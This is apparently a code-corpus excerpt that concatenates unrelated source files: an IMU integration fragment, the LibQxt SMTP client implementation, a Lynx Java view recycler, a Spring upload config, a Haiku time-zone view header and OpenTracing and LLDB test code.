                                       const localization_common::Time starting_time) {
  gtsam::Rot3 integrated_orientation = starting_orientation;
  lc::Time integrated_time = starting_time;
  for (const auto& imu_measurement : imu_measurements) {
    if (imu_measurement.timestamp <= integrated_time) continue;
    const double dt = imu_measurement.timestamp - integrated_time;
    integrated_time = imu_measurement.timestamp;
    // TODO(rsoussan): subtract ang vel bias first!! add this as param!!
    const gtsam::Rot3 orientation_update = gtsam::Rot3::Expmap(imu_measurement.angular_velocity * dt);
    // Right-multiply: the update is expressed in the body frame.
    integrated_orientation = integrated_orientation * orientation_update;
  }
  return integrated_orientation;
}
// Converts an internal IMU measurement to a ROS sensor_msgs::Imu message,
// copying acceleration, angular velocity, and the timestamp into the header.
sensor_msgs::Imu ImuMsg(const localization_measurements::ImuMeasurement& imu_measurement) {
  sensor_msgs::Imu imu_msg;
  msg_conversions::VectorToMsg(imu_measurement.acceleration, imu_msg.linear_acceleration);
  msg_conversions::VectorToMsg(imu_measurement.angular_velocity, imu_msg.angular_velocity);
  lc::TimeToHeader(imu_measurement.timestamp, imu_msg.header);
  return imu_msg;
}
} // namespace imu_augmentor
| 1,922 |
302 |
/****************************************************************************
** Copyright (c) 2006 - 2011, the LibQxt project.
** See the Qxt AUTHORS file for a list of authors and copyright holders.
** All rights reserved.
**
** Redistribution and use in source and binary forms, with or without
** modification, are permitted provided that the following conditions are met:
** * Redistributions of source code must retain the above copyright
** notice, this list of conditions and the following disclaimer.
** * Redistributions in binary form must reproduce the above copyright
** notice, this list of conditions and the following disclaimer in the
** documentation and/or other materials provided with the distribution.
** * Neither the name of the LibQxt project nor the
** names of its contributors may be used to endorse or promote products
** derived from this software without specific prior written permission.
**
** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
** ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
** WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
** DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
** DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
** (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
** LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
** ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
** (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
** SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**
** <http://libqxt.org> <<EMAIL>>
*****************************************************************************/
/*!
* \class QxtSmtp
* \inmodule QxtNetwork
* \brief The QxtSmtp class implements the SMTP protocol for sending email
*/
#include "mailsmtp.h"
#include "mailsmtp_p.h"
#include "mailhmac.h"
#include <QStringList>
#include <QTcpSocket>
#include <QNetworkInterface>
#ifndef QT_NO_OPENSSL
# include <QSslSocket>
#endif
// Private-implementation constructor: every auth mechanism is allowed until
// the user narrows the set via QxtSmtp::setAuthMethodEnabled().
QxtSmtpPrivate::QxtSmtpPrivate(QxtSmtp *q)
    : QObject(0), q_ptr(q)
    , allowedAuthTypes(QxtSmtp::AuthPlain | QxtSmtp::AuthLogin | QxtSmtp::AuthCramMD5)
{
    // empty ctor
}

// Constructs the SMTP client. With OpenSSL support the underlying socket is a
// QSslSocket (enabling STARTTLS and implicit TLS); otherwise a plain
// QTcpSocket is used.
QxtSmtp::QxtSmtp(QObject* parent)
    : QObject(parent), d_ptr(new QxtSmtpPrivate(this))
{
    d_ptr->state = QxtSmtpPrivate::Disconnected;
    d_ptr->nextID = 0;  // message IDs handed out by send() start at 1
#ifndef QT_NO_OPENSSL
    d_ptr->socket = new QSslSocket(this);
    QObject::connect(socket(), SIGNAL(encrypted()), this, SIGNAL(encrypted()));
    //QObject::connect(socket(), SIGNAL(encrypted()), &qxt_d(), SLOT(ehlo()));
#else
    d_func()->socket = new QTcpSocket(this);
#endif
    // Forward socket lifecycle signals to this object and route protocol I/O
    // into the private state machine (socketRead/sendNext).
    QObject::connect(socket(), SIGNAL(connected()), this, SIGNAL(connected()));
    QObject::connect(socket(), SIGNAL(disconnected()), this, SIGNAL(disconnected()));
    QObject::connect(socket(), SIGNAL(error(QAbstractSocket::SocketError)), d_func(), SLOT(socketError(QAbstractSocket::SocketError)));
    QObject::connect(this, SIGNAL(authenticated()), d_func(), SLOT(sendNext()));
    QObject::connect(socket(), SIGNAL(readyRead()), d_func(), SLOT(socketRead()));
}
/*!
 * Destroy the object.
 */
QxtSmtp::~QxtSmtp()
{
}

// Returns the user name used for SMTP AUTH (empty disables authentication).
QByteArray QxtSmtp::username() const
{
    return d_func()->username;
}

void QxtSmtp::setUsername(const QByteArray& username)
{
    d_func()->username = username;
}

// Returns the password used for SMTP AUTH (empty disables authentication).
QByteArray QxtSmtp::password() const
{
    return d_func()->password;
}

void QxtSmtp::setPassword(const QByteArray& password)
{
    d_func()->password = password;
}
// Queues a message for delivery and returns its ID (used by the mailSent /
// mailFailed signals). Sending starts immediately if the session is idle.
int QxtSmtp::send(const QxtMailMessage& message)
{
    int messageID = ++d_func()->nextID;
    d_func()->pending.append(qMakePair(messageID, message));
    if (d_func()->state == QxtSmtpPrivate::Waiting)
        d_func()->sendNext();
    return messageID;
}

// Number of messages queued but not yet fully processed.
int QxtSmtp::pendingMessages() const
{
    return d_func()->pending.count();
}

// The underlying transport socket (a QSslSocket when OpenSSL is available).
QTcpSocket* QxtSmtp::socket() const
{
    return d_func()->socket;
}

// Opens an unencrypted connection (STARTTLS may still upgrade it later).
void QxtSmtp::connectToHost(const QString& hostName, quint16 port)
{
    d_func()->useSecure = false;
    d_func()->state = QxtSmtpPrivate::StartState;
    socket()->connectToHost(hostName, port);
}

void QxtSmtp::connectToHost(const QHostAddress& address, quint16 port)
{
    connectToHost(address.toString(), port);
}

void QxtSmtp::disconnectFromHost()
{
    socket()->disconnectFromHost();
}

// When true, the client never issues STARTTLS even if the server offers it.
bool QxtSmtp::startTlsDisabled() const
{
    return d_func()->disableStartTLS;
}

void QxtSmtp::setStartTlsDisabled(bool disable)
{
    d_func()->disableStartTLS = disable;
}

#ifndef QT_NO_OPENSSL
// The transport socket as a QSslSocket (only available with OpenSSL).
QSslSocket* QxtSmtp::sslSocket() const
{
    return d_func()->socket;
}

// Opens an implicitly encrypted (SMTPS) connection.
void QxtSmtp::connectToSecureHost(const QString& hostName, quint16 port)
{
    d_func()->useSecure = true;
    d_func()->state = QxtSmtpPrivate::StartState;
    sslSocket()->connectToHostEncrypted(hostName, port);
}

void QxtSmtp::connectToSecureHost(const QHostAddress& address, quint16 port)
{
    connectToSecureHost(address.toString(), port);
}
#endif

// True if the server's EHLO response advertised the given extension.
bool QxtSmtp::hasExtension(const QString& extension)
{
    return d_func()->extensions.contains(extension);
}

// The parameter text the server sent alongside the extension keyword.
QString QxtSmtp::extensionData(const QString& extension)
{
    return d_func()->extensions[extension];
}

// Whether a given AUTH mechanism may be negotiated.
bool QxtSmtp::isAuthMethodEnabled(AuthType type) const
{
    return d_func()->allowedAuthTypes & type;
}

void QxtSmtp::setAuthMethodEnabled(AuthType type, bool enable)
{
    if(enable)
        d_func()->allowedAuthTypes |= type;
    else
        d_func()->allowedAuthTypes &= ~type;
}
// Maps socket errors onto the public failure signals: TLS handshake failures
// become encryptionFailed(); errors during initial connect become
// connectionFailed(). Other errors are intentionally left to the state machine.
void QxtSmtpPrivate::socketError(QAbstractSocket::SocketError err)
{
    if (err == QAbstractSocket::SslHandshakeFailedError)
    {
        emit q_func()->encryptionFailed();
        emit q_func()->encryptionFailed( socket->errorString().toLatin1() );
    }
    else if (state == StartState)
    {
        emit q_func()->connectionFailed();
        emit q_func()->connectionFailed( socket->errorString().toLatin1() );
    }
}
// Consumes complete CRLF-terminated reply lines from the socket and drives the
// SMTP client state machine. Partial lines stay in `buffer` until more data
// arrives; each full line is dispatched on the current session state.
void QxtSmtpPrivate::socketRead()
{
    buffer += socket->readAll();
    while (true)
    {
        // SMTP replies are CRLF-terminated; wait until a full line is buffered.
        int pos = buffer.indexOf("\r\n");
        if (pos < 0) return;
        QByteArray line = buffer.left(pos);
        buffer = buffer.mid(pos + 2);
        QByteArray code = line.left(3);  // the 3-digit SMTP reply code
        switch (state)
        {
        case StartState:
            // Expect a 2xx greeting; anything else aborts the connection.
            if (code[0] != '2')
            {
                state = Disconnected;
                emit q_func()->connectionFailed();
                emit q_func()->connectionFailed(line);
                socket->disconnectFromHost();
            }
            else
            {
                ehlo();
            }
            break;
        case HeloSent:
        case EhloSent:
        case EhloGreetReceived:
            // A '-' after the code means more EHLO extension lines follow.
            parseEhlo(code, (line[3] != ' '), QString::fromLatin1(line.mid(4)));
            break;
#ifndef QT_NO_OPENSSL
        case StartTLSSent:
            if (code == "220")
            {
                socket->startClientEncryption();
                ehlo();  // re-issue EHLO over the now-encrypted channel
            }
            else
            {
                // Server refused STARTTLS; continue in the clear.
                authenticate();
            }
            break;
#endif
        case AuthRequestSent:
        case AuthUsernameSent:
            // Continue the selected AUTH handshake; the server's challenge
            // (if any) follows the reply code.
            if (authType == QxtSmtp::AuthPlain) authPlain();
            else if (authType == QxtSmtp::AuthLogin) authLogin();
            else authCramMD5(line.mid(4));
            break;
        case AuthSent:
            if (code[0] == '2')
            {
                state = Authenticated;
                emit q_func()->authenticated();
            }
            else
            {
                state = Disconnected;
                emit q_func()->authenticationFailed();
                emit q_func()->authenticationFailed( line );
                socket->disconnectFromHost();
            }
            break;
        case MailToSent:
        case RcptAckPending:
            if (code[0] != '2') {
                emit q_func()->mailFailed( pending.first().first, code.toInt() );
                emit q_func()->mailFailed(pending.first().first, code.toInt(), line);
                // pending.removeFirst();
                // DO NOT remove it: the BodySent state still needs this entry
                // so the next mailFailed can be attributed to it in sendNext;
                // a RSET will be sent to clear things out.
                sendNext();
                state = BodySent;
            }
            else
                sendNextRcpt(code, line);
            break;
        case SendingBody:
            sendBody(code, line);
            break;
        case BodySent:
            if ( pending.count() )
            {
                // Guard against an empty queue: if a removeFirst() were done in
                // RcptAckPending/MailToSent on error we could reach this state
                // with nothing pending. The check is kept even though that
                // removeFirst is commented out above.
                if (code[0] != '2')
                {
                    emit q_func()->mailFailed(pending.first().first, code.toInt() );
                    emit q_func()->mailFailed(pending.first().first, code.toInt(), line);
                }
                else
                    emit q_func()->mailSent(pending.first().first);
                pending.removeFirst();
            }
            sendNext();
            break;
        case Resetting:
            if (code[0] != '2') {
                emit q_func()->connectionFailed();
                emit q_func()->connectionFailed( line );
            }
            else {
                state = Waiting;
                sendNext();
            }
            break;
        default:
            // Do nothing.
            break;
        }
    }
}
// Sends EHLO using the first non-loopback local address as the client name
// (falling back to 127.0.0.1) and clears any previously learned extensions.
void QxtSmtpPrivate::ehlo()
{
    QByteArray address = "127.0.0.1";
    foreach(const QHostAddress& addr, QNetworkInterface::allAddresses())
    {
        if (addr == QHostAddress::LocalHost || addr == QHostAddress::LocalHostIPv6)
            continue;
        address = addr.toString().toLatin1();
        break;
    }
    socket->write("ehlo " + address + "\r\n");
    extensions.clear();
    state = EhloSent;
}
// Handles one line of the EHLO/HELO response. On a non-250 code, falls back
// to HELO once, then gives up and QUITs. Otherwise accumulates advertised
// extensions until the final (non-continued) line, then proceeds to STARTTLS
// or authentication.
// `cont` is true while the server signals more lines follow ('-' separator).
void QxtSmtpPrivate::parseEhlo(const QByteArray& code, bool cont, const QString& line)
{
    if (code != "250")
    {
        // error!
        if (state != HeloSent)
        {
            // EHLO was rejected; maybe let's try the older HELO
            socket->write("helo\r\n");
            state = HeloSent;
        }
        else
        {
            // HELO failed too; nothing more we can do
            socket->write("QUIT\r\n");
            socket->flush();
            socket->disconnectFromHost();
        }
        return;
    }
    else if (state != EhloGreetReceived)
    {
        if (!cont)
        {
            // greeting only, no extensions
            state = EhloDone;
        }
        else
        {
            // greeting followed by extension lines
            state = EhloGreetReceived;
            return;
        }
    }
    else
    {
        // Record "KEYWORD params" as extensions[KEYWORD] = params.
        extensions[line.section(' ', 0, 0).toUpper()] = line.section(' ', 1);
        if (!cont)
            state = EhloDone;
    }
    if (state != EhloDone) return;
    if (extensions.contains(QStringLiteral("STARTTLS")) && !disableStartTLS)
    {
        startTLS();
    }
    else
    {
        authenticate();
    }
}
// Requests a TLS upgrade. Without OpenSSL support, skips straight to
// authentication.
void QxtSmtpPrivate::startTLS()
{
#ifndef QT_NO_OPENSSL
    socket->write("starttls\r\n");
    state = StartTLSSent;
#else
    authenticate();
#endif
}

// Picks the strongest mutually supported AUTH mechanism (CRAM-MD5, then
// PLAIN, then LOGIN). If the server offers no AUTH, no credentials are set,
// or no mechanism overlaps, the session is treated as authenticated.
void QxtSmtpPrivate::authenticate()
{
    if (!extensions.contains(QStringLiteral("AUTH")) || username.isEmpty() || password.isEmpty())
    {
        state = Authenticated;
        emit q_func()->authenticated();
    }
    else
    {
        QStringList auth = extensions[QStringLiteral("AUTH")].toUpper().split(' ', QString::SkipEmptyParts);
        if (auth.contains(QStringLiteral("CRAM-MD5")) && (allowedAuthTypes & QxtSmtp::AuthCramMD5))
        {
            authCramMD5();
        }
        else if (auth.contains(QStringLiteral("PLAIN")) && (allowedAuthTypes & QxtSmtp::AuthPlain))
        {
            authPlain();
        }
        else if (auth.contains(QStringLiteral("LOGIN")) && (allowedAuthTypes & QxtSmtp::AuthLogin))
        {
            authLogin();
        }
        else
        {
            state = Authenticated;
            emit q_func()->authenticated();
        }
    }
}
// CRAM-MD5 handshake: first call issues the AUTH command; the second call
// (with the server's base64 challenge) answers with
// base64(username + ' ' + hex(HMAC-MD5(password, challenge))).
void QxtSmtpPrivate::authCramMD5(const QByteArray& challenge)
{
    if (state != AuthRequestSent)
    {
        socket->write("auth cram-md5\r\n");
        authType = QxtSmtp::AuthCramMD5;
        state = AuthRequestSent;
    }
    else
    {
        QxtHmac hmac(QCryptographicHash::Md5);
        hmac.setKey(password);
        hmac.addData(QByteArray::fromBase64(challenge));

        QByteArray response = username + ' ' + hmac.result().toHex();
        socket->write(response.toBase64() + "\r\n");
        state = AuthSent;
    }
}

// AUTH PLAIN: sends base64("\0" + username + "\0" + password) after the
// initial AUTH command is acknowledged.
void QxtSmtpPrivate::authPlain()
{
    if (state != AuthRequestSent)
    {
        socket->write("auth plain\r\n");
        authType = QxtSmtp::AuthPlain;
        state = AuthRequestSent;
    }
    else
    {
        QByteArray auth;
        auth += '\0';
        auth += username;
        auth += '\0';
        auth += password;
        socket->write(auth.toBase64() + "\r\n");
        state = AuthSent;
    }
}

// AUTH LOGIN: three-step exchange — command, then base64 username, then
// base64 password.
void QxtSmtpPrivate::authLogin()
{
    if (state != AuthRequestSent && state != AuthUsernameSent)
    {
        socket->write("auth login\r\n");
        authType = QxtSmtp::AuthLogin;
        state = AuthRequestSent;
    }
    else if (state == AuthRequestSent)
    {
        socket->write(username.toBase64() + "\r\n");
        state = AuthUsernameSent;
    }
    else
    {
        socket->write(password.toBase64() + "\r\n");
        state = AuthSent;
    }
}
// Extracts the bare addr-spec from an RFC 2822-style mailbox such as
// `Display Name (comment) <user@host>`: returns the text between the first
// unquoted, uncommented '<' and the following '>'. Quoted strings ("...") and
// parenthesized comments are skipped so '<' inside them is ignored. If no
// angle-bracket address is found, the whole input is returned unchanged.
static QByteArray qxt_extract_address(const QString& address)
{
    int parenDepth = 0;     // nesting level of (comments)
    int addrStart = -1;     // index just past '<' once found, else -1
    bool inQuote = false;   // inside a "quoted string"
    int ct = address.length();

    for (int i = 0; i < ct; i++)
    {
        QChar ch = address[i];
        if (inQuote)
        {
            if (ch == '"')
                inQuote = false;
        }
        else if (addrStart != -1)
        {
            if (ch == '>')
                return address.mid(addrStart, (i - addrStart)).toLatin1();
        }
        else if (ch == '(')
        {
            parenDepth++;
        }
        else if (ch == ')')
        {
            parenDepth--;
            if (parenDepth < 0) parenDepth = 0;  // tolerate unbalanced ')'
        }
        else if (ch == '"')
        {
            if (parenDepth == 0)
                inQuote = true;
        }
        else if (ch == '<')
        {
            if (!inQuote && parenDepth == 0)
                addrStart = i + 1;
        }
    }
    return address.toLatin1();
}
// Starts delivery of the next queued message, RSET-ting the session first if
// it is not idle. Emits finished() when the queue drains. With PIPELINING all
// RCPT commands are sent at once; otherwise they are sent one by one as each
// ack arrives (see sendNextRcpt).
void QxtSmtpPrivate::sendNext()
{
    if (state == Disconnected)
    {
        // leave the mail in the queue if not ready to send
        return;
    }

    if (pending.isEmpty())
    {
        // if there are no additional mails to send, finish up
        state = Waiting;
        emit q_func()->finished();
        return;
    }

    if(state != Waiting) {
        // Session is mid-transaction (e.g. after a failure): reset it first;
        // the Resetting handler in socketRead will call sendNext again.
        state = Resetting;
        socket->write("rset\r\n");
        return;
    }
    const QxtMailMessage& msg = pending.first().second;
    rcptNumber = rcptAck = mailAck = 0;
    recipients = msg.recipients(QxtMailMessage::To) +
                 msg.recipients(QxtMailMessage::Cc) +
                 msg.recipients(QxtMailMessage::Bcc);
    if (recipients.count() == 0)
    {
        // can't send an e-mail with no recipients
        emit q_func()->mailFailed(pending.first().first, QxtSmtp::NoRecipients );
        emit q_func()->mailFailed(pending.first().first, QxtSmtp::NoRecipients, QByteArray( "e-mail has no recipients" ) );
        pending.removeFirst();
        sendNext();
        return;
    }
    // We explicitly use lowercase keywords because for some reason gmail
    // interprets any string starting with an uppercase R as a request
    // to renegotiate the SSL connection.
    socket->write("mail from:<" + qxt_extract_address(msg.sender()) + ">\r\n");
    if (extensions.contains(QStringLiteral("PIPELINING"))) // almost all do nowadays
    {
        foreach(const QString& rcpt, recipients)
        {
            socket->write("rcpt to:<" + qxt_extract_address(rcpt) + ">\r\n");
        }
        state = RcptAckPending;
    }
    else
    {
        state = MailToSent;
    }
}
// Processes one MAIL FROM / RCPT TO acknowledgment. The first 2xx ack belongs
// to MAIL FROM (mailAck); subsequent acks count accepted recipients. Once all
// recipients are answered: if none were accepted the message fails, otherwise
// DATA is issued. In non-pipelined mode the next RCPT is written here.
void QxtSmtpPrivate::sendNextRcpt(const QByteArray& code, const QByteArray&line)
{
    int messageID = pending.first().first;
    const QxtMailMessage& msg = pending.first().second;

    if (code[0] != '2')
    {
        // on failure, emit a warning signal
        if (!mailAck)
        {
            emit q_func()->senderRejected(messageID, msg.sender());
            emit q_func()->senderRejected(messageID, msg.sender(), line );
        }
        else
        {
            // NOTE(review): this reports msg.sender() for a rejected
            // *recipient*; presumably the rejected recipient address was
            // intended — confirm against the signal's documented contract.
            emit q_func()->recipientRejected(messageID, msg.sender());
            emit q_func()->recipientRejected(messageID, msg.sender(), line);
        }
    }
    else if (!mailAck)
    {
        mailAck = true;
    }
    else
    {
        rcptAck++;
    }

    if (rcptNumber == recipients.count())
    {
        // all recipients have been sent
        if (rcptAck == 0)
        {
            // no recipients were considered valid
            emit q_func()->mailFailed(messageID, code.toInt() );
            emit q_func()->mailFailed(messageID, code.toInt(), line);
            pending.removeFirst();
            sendNext();
        }
        else
        {
            // at least one recipient was acknowledged, send mail body
            socket->write("data\r\n");
            state = SendingBody;
        }
    }
    else if (state != RcptAckPending)
    {
        // send the next recipient unless we're only waiting on acks
        socket->write("rcpt to:<" + qxt_extract_address(recipients[rcptNumber]) + ">\r\n");
        rcptNumber++;
    }
    else
    {
        // If we're only waiting on acks, just count them
        rcptNumber++;
    }
}

// Handles the reply to DATA: on the expected 354 go-ahead, streams the RFC
// 2822 message followed by the terminating ".", otherwise fails the message.
void QxtSmtpPrivate::sendBody(const QByteArray& code, const QByteArray & line)
{
    int messageID = pending.first().first;
    const QxtMailMessage& msg = pending.first().second;

    if (code[0] != '3')
    {
        emit q_func()->mailFailed(messageID, code.toInt() );
        emit q_func()->mailFailed(messageID, code.toInt(), line);
        pending.removeFirst();
        sendNext();
        return;
    }

    socket->write(msg.rfc2822());
    socket->write(".\r\n");
    state = BodySent;
}
| 8,347 |
677 | // Copyright 2017 The Lynx Authors. All rights reserved.
package com.lynx.ui.swiper;
import android.util.SparseArray;
import com.lynx.core.impl.RenderObjectImpl;
import com.lynx.ui.LynxUI;
import java.util.ArrayList;
import java.util.List;
/**
 * Pool of detached {@link LynxUI} nodes keyed by render-object type, used by
 * the swiper pager to reuse views instead of re-creating them.
 *
 * <p>Fix: the original {@code recycleUI} called
 * {@code mRecycledUIBin.put(type, list)} a second time after adding to a list
 * that was already registered in the bin; the redundant put is removed.
 */
public class PagerRecyclerBin {

    // Recycled UIs grouped by render-object type.
    private SparseArray<List<LynxUI>> mRecycledUIBin;
    // Recycling is off until explicitly enabled via enableRecycle(true).
    private boolean enableRecycle = false;

    public PagerRecyclerBin() {
        mRecycledUIBin = new SparseArray<>();
    }

    /**
     * Returns a pooled UI of the given type for reuse, removing it from the
     * pool, or {@code null} if none is available.
     *
     * @param type render-object type key
     * @return a recycled UI, or null
     */
    public LynxUI getRecycledUI(int type) {
        List<LynxUI> list = mRecycledUIBin.get(type);
        if (list != null && list.size() > 0) {
            return list.remove(0);
        }
        return null;
    }

    /**
     * Recursively detaches the UI tree rooted at {@code impl}, unbinds each
     * UI's data, and places it into the pool under its render-object type.
     * No-op when recycling is disabled or {@code impl} has no UI attached.
     */
    public void recycleUI(RenderObjectImpl impl) {
        if (!enableRecycle) {
            return;
        }
        LynxUI ui = impl.getUI();
        if (ui == null) {
            return;
        }
        // Detach and recycle children first (depth-first).
        for (int i = 0; i < impl.getChildCount(); i++) {
            ui.removeChild(impl.getChildAt(i));
            recycleUI(impl.getChildAt(i));
        }
        // firstly get view's type
        int type = impl.getRenderObjectType();
        // unbind data from view
        ui.unbindData();
        // add the view to the pool, registering a fresh list if needed
        List<LynxUI> list = mRecycledUIBin.get(type);
        if (list == null) {
            list = new ArrayList<>();
            mRecycledUIBin.put(type, list);
        }
        list.add(ui);
    }

    /** Turns pooling on or off; when off, recycleUI() is a no-op. */
    public void enableRecycle(boolean enable) {
        enableRecycle = enable;
    }

    /** Drops every pooled UI. */
    public void clear() {
        mRecycledUIBin.clear();
    }
}
| 827 |
399 | <reponame>tzpBingo/IQL
package iql.web.config;
import org.springframework.boot.web.servlet.MultipartConfigFactory;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.core.annotation.Order;
import org.springframework.web.multipart.commons.CommonsMultipartResolver;
import org.springframework.web.multipart.support.MultipartFilter;
import javax.servlet.MultipartConfigElement;
/**
 * Multipart (file upload) configuration. All beans are currently commented
 * out, so Spring Boot's default multipart settings apply; the class is kept
 * as a template for re-enabling custom upload limits.
 */
@Configuration
public class MCFileUploadConfigurer {

//    @Bean
//    public MultipartConfigElement multipartConfigElement() {
//        MultipartConfigFactory factory = new MultipartConfigFactory();
//        // Limit the size of a single uploaded file; exceeding it throws,
//        // so the upload handler must deal with that exception.
//        factory.setMaxFileSize("100MB"); // KB,MB
//        /// Limit the total size of one upload request.
//        factory.setMaxRequestSize("512MB");
//        // Storage location for uploaded files.
//        // factory.setLocation("path");
//        return factory.createMultipartConfig();
//    }
//
//    @Bean
//    public CommonsMultipartResolver multipartResolver() {
//        CommonsMultipartResolver multipart = new CommonsMultipartResolver();
//        multipart.setMaxUploadSize(100 * 1024 * 1024);
//        return multipart;
//    }
//
//    @Bean
//    @Order(0)
//    public MultipartFilter multipartFilter() {
//        MultipartFilter multipartFilter = new MultipartFilter();
//        multipartFilter.setMultipartResolverBeanName("multipartResolver");
//        return multipartFilter;
//    }
}
| 680 |
1,338 | /*
* Copyright 2004-2012, Haiku, Inc. All Rights Reserved.
* Distributed under the terms of the MIT License.
*
* Authors:
* <NAME> <<EMAIL>>
* Julun <<EMAIL>>
* <NAME> <<EMAIL>>
*/
#ifndef ZONE_VIEW_H
#define ZONE_VIEW_H
#include <LayoutBuilder.h>
#include <TimeFormat.h>
#include <TimeZone.h>
class BButton;
class BMessage;
class BOutlineListView;
class BPopUpMenu;
class BRadioButton;
class BTimeZone;
class TimeZoneListItem;
class TimeZoneListView;
class TTZDisplay;
// Preferences view that lets the user pick a time zone and choose whether the
// hardware clock stores local time or GMT.
class TimeZoneView : public BGroupView {
public:
	TimeZoneView(const char* name);
	virtual ~TimeZoneView();

	virtual void AttachedToWindow();
	virtual void MessageReceived(BMessage* message);

	// True when the zone or GMT setting differs from the saved state.
	bool CheckCanRevert();

protected:
	virtual void DoLayout();

private:
	void _UpdateDateTime(BMessage* message);
	void _SetSystemTimeZone();
	void _UpdatePreview();
	void _UpdateCurrent();
	BString _FormatTime(const BTimeZone& timeZone);

	// RTC (hardware clock) local-vs-GMT persistence.
	void _ReadRTCSettings();
	void _WriteRTCSettings();
	void _UpdateGmtSettings();

	void _ShowOrHidePreview();

	void _InitView();
	void _BuildZoneMenu();

	void _Revert();

	TimeZoneListView* fZoneList;
	BButton* fSetZone;
	TTZDisplay* fCurrent;      // clock display for the active zone
	TTZDisplay* fPreview;      // clock display for the selected zone
	BRadioButton* fLocalTime;
	BRadioButton* fGmtTime;

	int32 fLastUpdateMinute;   // avoids redundant clock refreshes
	bool fUseGmtTime;
	bool fOldUseGmtTime;       // saved value used by _Revert()

	TimeZoneListItem* fCurrentZoneItem;
	TimeZoneListItem* fOldZoneItem;
	bool fInitialized;

	BTimeFormat fTimeFormat;
};
#endif // ZONE_VIEW_H
| 677 |
395 | /**
* Copyright 2017-2019 The OpenTracing Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package io.opentracing.contrib.spring.cloud.async.instrument;
import static org.awaitility.Awaitility.await;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.fail;
import io.opentracing.Scope;
import io.opentracing.Span;
import io.opentracing.contrib.spring.cloud.MockTracingConfiguration;
import io.opentracing.contrib.spring.cloud.TestUtils;
import io.opentracing.mock.MockSpan;
import io.opentracing.mock.MockTracer;
import java.time.Instant;
import java.util.List;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.Executor;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.RejectedExecutionException;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.boot.test.context.SpringBootTest;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.core.task.SimpleAsyncTaskExecutor;
import org.springframework.scheduling.concurrent.ThreadPoolTaskExecutor;
import org.springframework.scheduling.concurrent.ThreadPoolTaskScheduler;
import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
/**
* @author cbono
*/
@SpringBootTest(classes = {
    MockTracingConfiguration.class,
    TracedThreadPoolTaskSchedulerIntegrationTest.TestConfiguration.class
})
@RunWith(SpringJUnit4ClassRunner.class)
public class TracedThreadPoolTaskSchedulerIntegrationTest {

  /** Registers the {@link ThreadPoolTaskScheduler} whose tracing behaviour is under test. */
  @Configuration
  static class TestConfiguration {
    @Bean
    public ThreadPoolTaskScheduler threadPoolTaskScheduler() {
      final ThreadPoolTaskScheduler executor = new ThreadPoolTaskScheduler();
      executor.initialize();
      return executor;
    }
  }

  @Autowired
  private MockTracer mockTracer;

  @Autowired
  @Qualifier("threadPoolTaskScheduler")
  private ThreadPoolTaskScheduler threadPoolTaskScheduler;

  @Before
  public void before() {
    mockTracer.reset();
  }

  /** A task run via {@link CompletableFuture#supplyAsync} joins the active trace. */
  @Test
  public void testExecute() {
    final Span span = mockTracer.buildSpan("5150").start();
    try (Scope scope = mockTracer.activateSpan(span)) {
      final CompletableFuture<String> completableFuture = CompletableFuture.supplyAsync(() -> {
        mockTracer.buildSpan("child").start().finish();
        return "ok";
      }, threadPoolTaskScheduler);
      completableFuture.join();
    }
    span.finish();
    assertChildJoinedParentTrace();
  }

  /** A task submitted directly to the scheduler joins the active trace. */
  @Test
  public void testSubmit() throws Exception {
    final Span span = mockTracer.buildSpan("5150").start();
    try (Scope scope = mockTracer.activateSpan(span)) {
      final Future<?> child = threadPoolTaskScheduler.submit(() -> mockTracer.buildSpan("child").start().finish());
      child.get();
    }
    span.finish();
    assertChildJoinedParentTrace();
  }

  /** A task scheduled for later execution joins the active trace. */
  @Test
  public void testSchedule() throws Exception {
    final Span span = mockTracer.buildSpan("5150").start();
    try (Scope scope = mockTracer.activateSpan(span)) {
      final Future<?> child = threadPoolTaskScheduler.schedule(
          () -> mockTracer.buildSpan("child").start().finish(),
          Instant.now().plusSeconds(5));
      child.get();
    }
    span.finish();
    assertChildJoinedParentTrace();
  }

  /** Waits for both spans to finish, then asserts exactly two spans sharing one trace id. */
  private void assertChildJoinedParentTrace() {
    await().until(() -> mockTracer.finishedSpans().size() == 2);
    final List<MockSpan> mockSpans = mockTracer.finishedSpans();
    assertEquals(2, mockSpans.size());
    TestUtils.assertSameTraceId(mockSpans);
  }
}
| 1,536 |
2,338 | import lldb
from intelpt_testcase import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
from lldbsuite.test.decorators import *
class TestTraceLoad(TraceIntelPTTestCaseBase):
  """Tests for the ``trace schema`` command of the intel-pt trace plug-in."""

  mydir = TestBase.compute_mydir(__file__)

  def testSchema(self):
    """The intel-pt schema output mentions its top-level keys."""
